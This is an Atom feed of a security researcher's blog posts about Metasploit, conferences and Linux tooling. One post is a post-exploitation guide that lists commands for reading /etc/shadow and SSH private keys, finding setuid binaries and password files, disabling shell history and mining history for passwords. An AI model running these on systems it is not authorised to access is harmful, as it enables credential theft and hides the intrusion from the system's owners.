<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-27714325</id><updated>2011-12-20T18:09:27.236-08:00</updated><category term='screen'/><category term='lego'/><category term='encoding'/><category term='movies'/><category term='vmware'/><category term='security'/><category term='ssh'/><category term='problems linking ws2_32'/><category term='conference'/><category term='bash'/><category term='mosref'/><category term='sshd'/><category term='i hate windows programming'/><category term='tactical exploitation'/><category term='life'/><category term='encryption'/><category term='base64'/><category term='mingw'/><category term='intar-tubes'/><category term='shovel'/><category term='unix'/><category term='keylogger'/><category term='keyboard'/><category term='mosquito'/><category term='pure bash'/><category term='ubuntu'/><category term='ridiculous'/><category term='mingw32'/><title type='text'>$ dd if=/dev/profanity</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' 
uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>30</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-27714325.post-6748928695745125216</id><published>2010-01-21T12:21:00.000-08:00</published><updated>2010-01-22T09:03:38.905-08:00</updated><title type='text'>Blackhat DC</title><content type='html'>Another Metasploit track is in the works, this time for &lt;a href="http://www.blackhat.com/html/bh-dc-10/bh-dc-10-home.html"&gt;Blackhat DC&lt;/a&gt;.  I will be presenting on &lt;a href="http://blackhat.com/html/bh-dc-10/bh-dc-10-briefings.html#Egypt"&gt;exploit automation using the Metasploit Framework&lt;/a&gt;.  Hope to see you there.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-6748928695745125216?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/6748928695745125216/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=6748928695745125216' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/6748928695745125216'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/6748928695745125216'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2010/01/blackhat-dc.html' title='Blackhat DC'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-1009880400746031485</id><published>2009-10-21T22:56:00.000-07:00</published><updated>2009-10-21T23:05:21.820-07:00</updated><title type='text'>Media Frenzy</title><content type='html'>Some life-changing events going on over at &lt;a href="http://blog.metasploit.com/2009/10/joining-team.html"&gt;the metasploit blog&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-1009880400746031485?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/1009880400746031485/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=1009880400746031485' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1009880400746031485'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1009880400746031485'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2009/10/media-frenzy.html' title='Media Frenzy'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-6793285657615085487</id><published>2009-08-08T23:06:00.000-07:00</published><updated>2009-08-08T23:35:15.909-07:00</updated><title type='text'>Sliding Home</title><content type='html'>As promised, my slides for Blackhat/Defcon 2009 have been placed in a web-accessible location:  &lt;a 
href="http://metasploit.com/users/egypt/guided-missiles.pdf"&gt;Using Guided Missiles in Drive-bys&lt;/a&gt;.  Thanks everyone who showed up.  To those who didn't, maybe I'll see you next time.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-6793285657615085487?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/6793285657615085487/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=6793285657615085487' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/6793285657615085487'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/6793285657615085487'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2009/08/sliding-home.html' title='Sliding Home'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-506333694950131719</id><published>2009-07-14T21:13:00.000-07:00</published><updated>2009-07-15T22:41:47.405-07:00</updated><title type='text'>A Dark-colored Chapeau</title><content type='html'>I'm making this post in the vain hope that someone cares about what security conference topics I find interesting.  With that being said, Blackhat is going to be awesome this year, not least because of the Metasploit track.  
Without further ado, here are the talks I plan to attend.&lt;br /&gt;&lt;br /&gt;Day One:&lt;br /&gt;&lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Egypt"&gt;I'm presenting at 13:45&lt;/a&gt; and, judging by my history, I probably won't be done with my slides until about 13:43, so I'm planning to miss all of the morning stuff.&lt;br /&gt;&lt;br /&gt;15:15 &lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Esser"&gt;Stefan Esser: State of the Art Post Exploitation in Hardened PHP Environments&lt;/a&gt;&lt;br /&gt;This is a tough choice and I may end up flipping on it later.  Valsmith and Colin's stuff is freaking awesome but I think Esser's work could end up being really useful for PHP meterpreter.&lt;br /&gt;&lt;br /&gt;16:45 &lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#VSmith"&gt;Valsmith, Ames, Kerb: Metaphish pt2.&lt;/a&gt;&lt;br /&gt;I hope I can get into the room after the break.&lt;br /&gt;&lt;br /&gt;Day Two:&lt;br /&gt;&lt;br /&gt;10:00 &lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Datagram"&gt;Datagram: Lockpicking Forensics&lt;/a&gt;&lt;br /&gt;Lockpicking is a terrifically fun hobby and I'd like to learn more about it.&lt;br /&gt;&lt;br /&gt;11:15 &lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Harbour"&gt;Nick Harbour: Win at Reversing&lt;/a&gt;&lt;br /&gt;I usually lose.&lt;br /&gt;&lt;br /&gt;13:45 &lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Quist"&gt;Danny Quist &amp; Lorie Liebrock: Reverse Engineering by Crayon&lt;/a&gt;&lt;br /&gt;Dr. Liebrock was a professor of mine and Danny is one of the best Reverse Engineers I've ever met.  
Can't miss this one.&lt;br /&gt;&lt;br /&gt;15:15 &lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Kortchinsky"&gt;Kostya Kortchinsky: Cloudburst - Hacking 3D and Breaking out of VMware&lt;/a&gt;&lt;br /&gt;I'm not especially interested in VMware but Kostya Kortchinsky is an exploit machine.  If I die half as good as Kostya is today, I'll be happy.&lt;br /&gt;&lt;br /&gt;16:45 &lt;a href="http://blackhat.com/html/bh-usa-09/bh-usa-09-speakers.html#Iozzo"&gt;Vincenzo Iozzo &amp; Charlie Miller: Post Exploitation Bliss - Loading Meterpreter on a Factory iPhone&lt;/a&gt;&lt;br /&gt;Meterpreter is awesome and having the same post-exploitation toolkit available on multiple platforms is something I've wanted for a long time.  The fact that these guys ported it to a tiny embedded device that frequently gets connected to tons of open wifi networks is an extra bonus.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-506333694950131719?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/506333694950131719/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=506333694950131719' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/506333694950131719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/506333694950131719'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2009/07/dark-colored-chapeau.html' title='A Dark-colored Chapeau'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-5387794772018584318</id><published>2009-05-14T21:39:00.000-07:00</published><updated>2009-05-16T11:51:16.084-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='keyboard'/><category scheme='http://www.blogger.com/atom/ns#' term='vmware'/><category scheme='http://www.blogger.com/atom/ns#' term='ubuntu'/><title type='text'>VMWare keyboard issues</title><content type='html'>I've been fighting with keyboard issues in VMWare since I started using Ubuntu.  I'm not sure if the problems are specific to Ubuntu or if they were just introduced around the time I moved away from Gentoo, but either way, it's really annoying.  First, VMWare would occasionally not recognize keys correctly in guests.  The down arrow would become the windows key, shift would become ctrl, and alt, home, end, pgup, pgdn and the rest of the arrow keys would appear to quit functioning altogether.  Outside of the guest, everything was fine.  The fix for that was to tell VMWare to use the keymap provided by X instead of trying to figure it out.  Open up ~/.vmware/config with your favorite editor (creating it if it doesn't exist) and add the following line:&lt;br /&gt;&lt;code&gt;xkeymap.noKeycodeMap = "TRUE"&lt;/code&gt;&lt;br /&gt;Thanks to http://nthrbldyblg.blogspot.com/2008/06/vmware-and-fubar-keyboard-effect.html for this one.&lt;br /&gt;&lt;br /&gt;Next, VMWare would occasionally cause all of the same keys from the previous bug either to stop working or to act as though they are permanently pressed in the &lt;i&gt;host&lt;/i&gt;.  After playing with this bug for awhile I found that it happens most reliably when coming out of full-screen mode.  There's no real solution for this one, but running "&lt;tt&gt;setxkbmap&lt;/tt&gt;" from a terminal fixes it.  
&lt;a href="http://communities.vmware.com/thread/150155"&gt;The vmware forums have a thread&lt;/a&gt; about this issue.  Since I sometimes can't type when this bug strikes (e.g. when ctrl is stuck), I added a launcher to my gnome panel so that a single mouse click can give me my keyboard back.&lt;br /&gt;&lt;br /&gt;Lastly, when using ctrl-g to have vmware grab input, it never releases the g key.  I haven't found a fix for this (except to avoid using ctrl-g) and the only way I've found to get a working desktop back is to ssh in from another machine and &lt;tt&gt;killall vmware&lt;/tt&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-5387794772018584318?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/5387794772018584318/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=5387794772018584318' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/5387794772018584318'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/5387794772018584318'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2009/05/ive-been-fighting-with-keyboard-issues.html' title='VMWare keyboard issues'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-3296473911213183511</id><published>2008-12-07T12:20:00.000-08:00</published><updated>2009-05-16T11:51:33.366-07:00</updated><category 
scheme='http://www.blogger.com/atom/ns#' term='ubuntu'/><title type='text'>rubuntu</title><content type='html'>The Ubuntu package &lt;tt&gt;ruby1.8&lt;/tt&gt; does not install an executable called ruby.  It is expected that users install the package &lt;tt&gt;ruby&lt;/tt&gt; which depends on &lt;tt&gt;ruby1.8&lt;/tt&gt; and installs a single file: a symlink called /usr/bin/ruby that points to /usr/bin/ruby1.8.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-3296473911213183511?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/3296473911213183511/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=3296473911213183511' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/3296473911213183511'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/3296473911213183511'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/12/rubuntu.html' title='rubuntu'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-1419344517548660902</id><published>2008-11-19T21:02:00.000-08:00</published><updated>2008-11-19T21:37:23.893-08:00</updated><title type='text'>Metasploit 3.2 released</title><content type='html'>Despite a number of delays and HDM's slave-driving schedule, The Metasploit Framework version 3.2 was officially released today.  
My main contributions include reliable bind, reverse, and findsock payloads for PHP script vulnerabilities and Browser Autopwn, a web client fingerprinting exploit machine.&lt;br /&gt;&lt;br /&gt;I will post more about Browser Autopwn, including some step-by-step explanations of how I use it, in the coming days.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-1419344517548660902?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/1419344517548660902/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=1419344517548660902' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1419344517548660902'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/1419344517548660902'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/11/metasploit-32-released.html' title='Metasploit 3.2 released'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-6296137092874037811</id><published>2008-11-09T21:42:00.000-08:00</published><updated>2009-05-16T10:26:53.472-07:00</updated><title type='text'>obj.grabAnkles();</title><content type='html'>As far as I can tell, it is impossible to determine whether an ActiveX object created by classid actually works without just calling specific methods of that control and catching any exceptions.  
It doesn't seem to matter whether it was created with an &lt;tt&gt;&amp;lt;object&amp;gt;&lt;/tt&gt; tag, or through javascript's &lt;tt&gt;document.createElement("object")&lt;/tt&gt; or &lt;tt&gt;document.write("&amp;lt;object...&amp;gt;")&lt;/tt&gt;.  Internet Explorer turns anything with an id attribute into a property of &lt;tt&gt;document&lt;/tt&gt;, and yet if you have &lt;br /&gt;&lt;code&gt;&lt;br /&gt;&amp;lt;object id="foo" classid="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" /&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;tt&gt;document.foo&lt;/tt&gt; advertises no property or method that is not available from an object with no classid.&lt;br /&gt;&lt;br /&gt;For those of you playing at home, yes this classid is one of the vulnerable ActiveX controls used in the MDAC / ie_createobject exploits.  If the object actually got instantiated correctly and we can talk to it, &lt;tt&gt;typeof(document.foo.CreateObject)&lt;/tt&gt; returns "unknown" rather than the "undefined" returned for properties that don't exist.  So if we know a specific method that the ActiveX implements, we can check to make sure it worked using that.  It is unfortunate, then, that there does not seem to be a standard method or property that all ActiveX objects must implement.  Unless I'm missing something, because of the lack of a universal method or property, we cannot generically determine whether an ActiveX control created in this way was successfully instantiated.  Thus, my "solution" for now is to save a method to test along with the classid.  If this doesn't work, I just might give up on browser_autopwn's fingerprinting altogether and simply throw every single exploit at the client.  And also maybe shoot myself.  
I really hate IE.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-6296137092874037811?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/6296137092874037811/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=6296137092874037811' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/6296137092874037811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/6296137092874037811'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/11/objgrabankles.html' title='obj.grabAnkles();'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-3521695046510576275</id><published>2008-10-30T22:41:00.000-07:00</published><updated>2008-10-30T22:57:04.426-07:00</updated><title type='text'>Tag, you're it</title><content type='html'>When I started writing ruby I missed the convenience of a &lt;tt&gt;tags&lt;/tt&gt; file for jumping around in vim to different parts of a project.  After a bit of digging I found &lt;a href="http://rubyforge.org/projects/rtags/"&gt;rtags&lt;/a&gt; to replace my beloved exuberant-ctags.  Today I updated my metasploit trunk and, since it had been awhile since I had updated tags, I also ran rtags.  Normally rtags is slow.  Running it in the metasploit source tree typically takes several minutes.  
Today it seemed to hit infinite loops in multiple files, taking more than ten minutes on a single file before I killed it, added that file to the exclude list, ran it again and walked away for a while.  After running into this a dozen times or so over the course of the day, I decided to switch tactics.  As it turns out, exuberant-ctags has support for ruby, and probably has had it since before I started using rtags.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;root framework3 # time ctags --exclude '.svn' \&lt;br /&gt;--exclude=documentation/ --exclude=external/  \&lt;br /&gt;--exclude=data --recurse .&lt;br /&gt;&lt;br /&gt;real 0m0.742s&lt;br /&gt;user 0m0.616s&lt;br /&gt;sys 0m0.092s&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;*sigh*&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-3521695046510576275?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/3521695046510576275/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=3521695046510576275' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/3521695046510576275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/3521695046510576275'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/10/tag-youre-it.html' title='Tag, you&apos;re it'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-7028677376325561118</id><published>2008-10-21T15:51:00.000-07:00</published><updated>2008-10-21T16:20:17.233-07:00</updated><title type='text'>Torontosploit</title><content type='html'>While attending &lt;a href="http://sector.ca"&gt;SecTor&lt;/a&gt;, I finally met HD Moore in person after having been a core developer for Metasploit for almost eight months.  I had been introduced to him at Defcon a couple of years ago but we didn't actually talk so it doesn't count.  Over beers, he asked me to co-present "Metasploit Prime," a discussion of new features available in the upcoming Metasploit 3.2-release.  The release itself will be announced in the next few days.  &lt;a href="http://metasploit.com/data/confs/sector2008/metasploit_prime.pdf"&gt;Slides&lt;/a&gt;(pdf) and &lt;a href="http://sector.ca/presentations/video/Sector%202008%20-%20H%20D%20Moore.wmv"&gt;video&lt;/a&gt; (wmv) for that presentation are now available.  The video is actually just audio over the slides, which is somewhat disappointing.  This is a gripe I've had with Blackhat for many years and Sector made the same mistake.  Regardless of that little issue, Sector was a blast; I learned some stuff and had a great time in Toronto hanging out with HD, &lt;a href="http://jaybeale.vox.com/"&gt;Jay Beale&lt;/a&gt;, Mark Fabro, and a bunch of other incredibly smart guys.  SecTor is much smaller than Defcon (which is the only other security conference I've been to) and I really liked the tighter knit crowd -- it makes it much easier to meet people.  It was considerably less technical but I enjoyed it nonetheless.  At Defcon, I mostly just hung out with people I already knew because the crowds were so daunting while at Sector, it was easy to meet the rockstar presenters as well as lesser-known attending geniuses.  
Because of my experience at Sector, I will certainly look at smaller conferences in a new light.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-7028677376325561118?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/7028677376325561118/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=7028677376325561118' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7028677376325561118'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/7028677376325561118'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/10/torontosploit.html' title='Torontosploit'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-319290307145217606</id><published>2008-07-05T12:30:00.001-07:00</published><updated>2008-07-06T10:40:33.205-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tactical exploitation'/><category scheme='http://www.blogger.com/atom/ns#' term='bash'/><category scheme='http://www.blogger.com/atom/ns#' term='unix'/><title type='text'>100 UNIX commands to issue on other people's systems</title><content type='html'>In response to &lt;a href="http://addxorrol.blogspot.com/2008/07/security-book-that-id-like-to-see.html"&gt;Halvar Flake's request&lt;/a&gt;...&lt;br /&gt;&lt;br /&gt;I'm not sure about 100, but there are a few that I use on any new system, mostly 
just basics that are useful on any multi-user environment: &lt;tt&gt;ifconfig -a&lt;/tt&gt;, &lt;tt&gt;netstat -pan --inet&lt;/tt&gt;, &lt;tt&gt;uname -a&lt;/tt&gt;, &lt;tt&gt;w&lt;/tt&gt;, &lt;tt&gt;id&lt;/tt&gt;, &lt;tt&gt;mount&lt;/tt&gt;, &lt;tt&gt;ps auxww&lt;/tt&gt;.&lt;br /&gt;&lt;br /&gt;These tell you a lot about the system and where you might go from there for further exploitation.  &lt;tt&gt;ifconfig&lt;/tt&gt;, like &lt;tt&gt;ipconfig&lt;/tt&gt; on Windows, can tell you if the system has a NIC on another network and &lt;tt&gt;netstat&lt;/tt&gt; can tell you if it's talking to one.  It's important to note that options to netstat vary from one OS to another -- the above options will list all AF_INET sockets along with associated process IDs on Linux without doing DNS lookups.  On Solaris and AIX it is not possible to see PIDs and the command to list all AF_INET sockets without doing DNS lookups is &lt;tt&gt;netstat -an -finet&lt;/tt&gt;.  &lt;tt&gt;uname&lt;/tt&gt; tells you the OS name and kernel version.  &lt;tt&gt;w&lt;/tt&gt; (or its cousin &lt;tt&gt;who&lt;/tt&gt;) will let you know if someone might be watching.  &lt;tt&gt;id&lt;/tt&gt; is &lt;tt&gt;whoami&lt;/tt&gt; on steroids; it gives uid, gid, and a list of groups you belong to.  &lt;tt&gt;mount&lt;/tt&gt; tells you how the system's storage is laid out and whether there are any removable drives attached at the moment.  &lt;tt&gt;ps&lt;/tt&gt; lists processes and the argument tells it to list all of them, including arguments, with the owner's username.  If you're lucky, sometimes you see things like this:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;root     21810  0.0  0.4   6984  2452 pts/10   S+   21:13   0:00 mysql -uroot -ppassword&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Then we come to interesting files.  Obviously &lt;tt&gt;/etc/passwd&lt;/tt&gt; and &lt;tt&gt;/etc/shadow&lt;/tt&gt; are of interest.  
But so are slightly more obscure things like &lt;tt&gt;/home/*/.ssh/id_rsa&lt;/tt&gt; (private keys) and &lt;tt&gt;/tmp/ssh-*/*&lt;/tt&gt; (ssh-agent auth sockets).  I mentioned some abuses of these files about a &lt;a href="http://0xegypt.blogspot.com/2007/01/nastier-tricks-with-ssh.html"&gt;year and a half ago&lt;/a&gt;.  I suggest a viewing of HD Moore and Valsmith's Blackhat 2007 talk, &lt;a href="http://www.metasploit.com/data/confs/blackhat2007/tactical_blackhat2007.pdf"&gt;Tactical Exploitation&lt;/a&gt; for some more fun things to do with ssh and kerberos.&lt;br /&gt;&lt;br /&gt;Finding interesting files can sometimes be a problem, so we have &lt;tt&gt;find&lt;/tt&gt; to help us out.  For instance, if you want to list all of the binaries you have permission to read with the setuid bit set: &lt;tt&gt;find / -perm -4000 2&gt;/dev/null&lt;/tt&gt;.  All files with password or passwd in their name: &lt;tt&gt;find / -iname '*passwd*' -or -iname '*password*'&lt;/tt&gt;.&lt;br /&gt;&lt;br /&gt;If you worry about leaving commands in a history file, you'll probably want to &lt;tt&gt;unset HISTFILE&lt;/tt&gt;.  On the other hand, sometimes the history helps an attacker, too.  In bash the command &lt;tt&gt;history&lt;/tt&gt; lists all of the commands in the history file.  
So &lt;tt&gt;history | grep -A1 '^ssh'&lt;/tt&gt; and &lt;tt&gt;history | grep -A1 '^su'&lt;/tt&gt; can often yield passwords when the user whose account you've compromised doesn't pay attention to make sure the password prompt actually came up before typing.&lt;br /&gt;&lt;br /&gt;A few more commands that are really cool but are less likely to be installed include: lsof and screen.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/27714325-319290307145217606?l=0xegypt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0xegypt.blogspot.com/feeds/319290307145217606/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=27714325&amp;postID=319290307145217606' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/319290307145217606'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/27714325/posts/default/319290307145217606'/><link rel='alternate' type='text/html' href='http://0xegypt.blogspot.com/2008/07/100-unix-commands-to-issue-on-other.html' title='100 UNIX commands to issue on other people&apos;s systems'/><author><name>egypt</name><uri>http://www.blogger.com/profile/11769900739692795929</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-27714325.post-1203291025523549314</id><published>2008-03-11T20:22:00.000-07:00</published><updated>2008-03-11T20:55:01.975-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='i hate windows programming'/><category scheme='http://www.blogger.com/atom/ns#' term='mingw32'/><category 